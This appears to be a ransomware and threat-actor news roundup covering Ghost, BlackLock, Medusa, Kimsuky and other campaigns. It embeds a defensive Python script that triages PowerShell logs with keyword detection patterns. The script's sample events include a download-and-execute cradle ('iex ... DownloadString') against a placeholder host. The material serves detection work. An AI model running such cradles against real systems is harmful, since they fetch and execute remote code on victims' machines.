CISA, FBI, and MS-ISAC issued a joint cybersecurity advisory warning organizations about Ghost (Cring) ransomware, a sophisticated cyber threat that has been compromising critical infrastructure, businesses, and government entities worldwide. CISA also added one new vulnerability to its Known Exploited Vulnerabilities Catalog. The advisory, part of the #StopRansomware campaign, outlines the attack methods, technical details, and mitigation strategies needed to defend against this persistent ransomware strain.
Lee Enterprises, a major newspaper publisher, confirmed a ransomware attack affecting 77 newspapers and 350 weekly publications, encrypting critical applications and exfiltrating certain files. The StaryDobry campaign used trojanized game installers to deploy the XMRig cryptominer to unsuspecting users, particularly in Russia, Brazil, Germany, Belarus, and Kazakhstan. BlackLock ransomware is emerging as a major player; it uses custom-built malware targeting Windows, VMware ESXi, and Linux environments, and its operators are using double-extortion tactics.
The NailaoLocker ransomware is targeting European healthcare organizations. This ransomware uses VPN flaws and is deployed via ShadowPad and PlugX backdoors. The attackers, linked to China-nexus groups, have evolved their malware.
The Medusa ransomware group has claimed responsibility for a cyberattack on UK healthcare giant HCRG Care Group. The attackers are demanding $2 million in ransom for the stolen data, totaling 2.3 TB. The incident is under investigation, and HCRG is working to assess the extent of the breach and its impact on operations. This attack highlights the increasing targeting of healthcare organizations by ransomware groups, threatening the confidentiality and integrity of sensitive patient data.
Medusa ransomware has been known for targeting healthcare organizations and demanding huge ransoms. This is a direct threat to the privacy of patients, and it is expected that a full-scale security review will be undertaken to find out the root causes of this breach.
The BlackLock ransomware group is poised to become one of the most prolific RaaS operators in 2025. The group cropped up in early 2024 and is known for its unusually active presence and good reputation on the ransomware-focused Russian-language forum RAMP, and for its aggressive recruiting of traffers, initial access brokers, and affiliates. The group uses custom-built ransomware that employs significant anti-analysis techniques to evade analysis.
Recent cybersecurity analyses reveal that ransomware gangs are accelerating their operations, with the average time-to-ransom (TTR) now standing at just 17 hours, a significant shift from previous tactics. The attackers are adopting advanced evasion techniques and data extortion strategies, making detection more challenging. This acceleration leaves less time for organizations to detect and respond to incidents.
Espionage tools typically associated with China-linked threat actors were detected in a November 2024 RA World ransomware attack against an Asian software and services firm. Attackers first focused on cyberespionage in an attack against a Southeastern European country’s foreign ministry in July and compromised the Asian firm by exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials.
The North Korea-linked APT group Kimsuky, also known as Emerald Sleet, is using a new tactic to compromise its traditional espionage targets. The group is tricking targets into running PowerShell as an administrator and executing malicious code. They build rapport with targets before sending a spear-phishing email with an attached PDF. The registration link has instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet. If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool. This allows the threat actor to access the device and carry out data exfiltration.
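The lure above depends on the target pasting downloaded-and-executed code into an elevated, interactive PowerShell console. A defender can look for exactly that combination in PowerShell script block logs. The following is an added example, not part of the advisory or any vendor's detection content: it triages a few constructed log records (a simplified stand-in for Event ID 4104 script block entries) and assumes an enrichment field `elevated`, which real 4104 events do not carry directly and which would have to be correlated from process creation events. The URLs and event ids are constructed placeholders.

```python
import re
from dataclasses import dataclass


@dataclass
class ScriptBlockEvent:
    """Simplified PowerShell script block log record (constructed for this example)."""
    event_id: int
    host_app: str       # "ConsoleHost" means an interactive console session
    elevated: bool      # assumed enrichment: was the PowerShell process elevated?
    script_text: str


# Primitives that fetch content from the network (matched case-insensitively).
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"downloadfile",
    r"invoke-restmethod", r"start-bitstransfer", r"\bcurl\b", r"\bwget\b",
]

# Primitives that run or unpack what was fetched.
EXECUTE_PATTERNS = [
    r"invoke-expression", r"\biex\b", r"start-process", r"expand-archive", r"msiexec",
]


def _any_match(patterns, text):
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)


def classify(ev: ScriptBlockEvent) -> str:
    """Return 'lure-like', 'suspicious' or 'benign' for one script block event.

    lure-like : download + execute, in an elevated interactive console (the
                paste-into-admin-PowerShell pattern described above)
    suspicious: download + execute anywhere else (worth a look, lower priority)
    benign    : everything else, including plain downloads or admin housekeeping
    """
    downloads = _any_match(DOWNLOAD_PATTERNS, ev.script_text)
    executes = _any_match(EXECUTE_PATTERNS, ev.script_text)
    if not (downloads and executes):
        return "benign"
    if ev.elevated and ev.host_app == "ConsoleHost":
        return "lure-like"
    return "suspicious"


def triage(events):
    """Map event_id -> verdict for every event that is not benign."""
    verdicts = {ev.event_id: classify(ev) for ev in events}
    return {eid: v for eid, v in verdicts.items() if v != "benign"}


# Constructed sample events; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1001, "ConsoleHost", True,
                     "$u='https://example.invalid/reg/setup.zip'; "
                     "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\setup.zip; "
                     "Expand-Archive $env:TEMP\\setup.zip -DestinationPath $env:TEMP\\setup; "
                     "Start-Process $env:TEMP\\setup\\install.exe"),
    ScriptBlockEvent(1002, "ConsoleHost", True,
                     "Get-Service | Where-Object { $_.Status -eq 'Stopped' } | Format-Table"),
    ScriptBlockEvent(1003, "ServerRemoteHost", False,
                     "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"),
    ScriptBlockEvent(1004, "ConsoleHost", False,
                     "Invoke-WebRequest https://example.invalid/report.csv -OutFile C:\\temp\\r.csv"),
]


if __name__ == "__main__":
    for eid, verdict in triage(SAMPLE_EVENTS).items():
        print(f"event {eid}: {verdict}")
```

The rule deliberately keeps a plain download (event 1004) and routine elevated administration (event 1002) out of the queue; the signal is the pairing of a fetch with an execute step, and the elevation plus interactive console is what raises it to the pattern this lure produces. In production the keyword lists would need tuning against an organization's own baseline of legitimate deployment scripts.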
The Sarcoma ransomware group has claimed responsibility for a breach at Unimicron, a Taiwanese printed circuit board (PCB) manufacturer. The attackers claim to have stolen 377 GB of data, including SQL files, and are threatening to release it if a ransom is not paid. The company confirmed a ransomware intrusion at its China-based subsidiary but has not yet confirmed the data breach.
Kimsuky, a North Korean state-sponsored hacking group, conducted a targeted attack campaign (“DEEP#DRIVE”) against South Korean entities in the business, government, and cryptocurrency sectors. The campaign involved spear-phishing emails with malicious PDF documents and PowerShell code execution. This highlights the persistent threat from state-sponsored actors targeting specific sectors.
International law enforcement agencies have seized the dark web leak site of the 8Base ransomware gang. The takedown is a significant success in disrupting ransomware operations and potentially preventing future attacks, and it demonstrates the importance of international collaboration in taking direct action against cybercrime, and ransomware in particular.
Ransomware payments significantly decreased in 2024, falling 35% to ~$813.55 million, as more victims refused to pay. Despite a higher number of victims being posted on ransomware gang leak sites, fewer organizations yielded to extortion demands. This shift indicates a growing resistance to paying ransoms, potentially driven by improved data recovery strategies and law enforcement efforts.
The report underscores the evolving landscape of ransomware attacks, with a focus on victim empowerment through refusal to pay. It also suggests that while the number of attacks may remain high, the financial success of ransomware operations is diminishing, signaling a potential change in attacker tactics.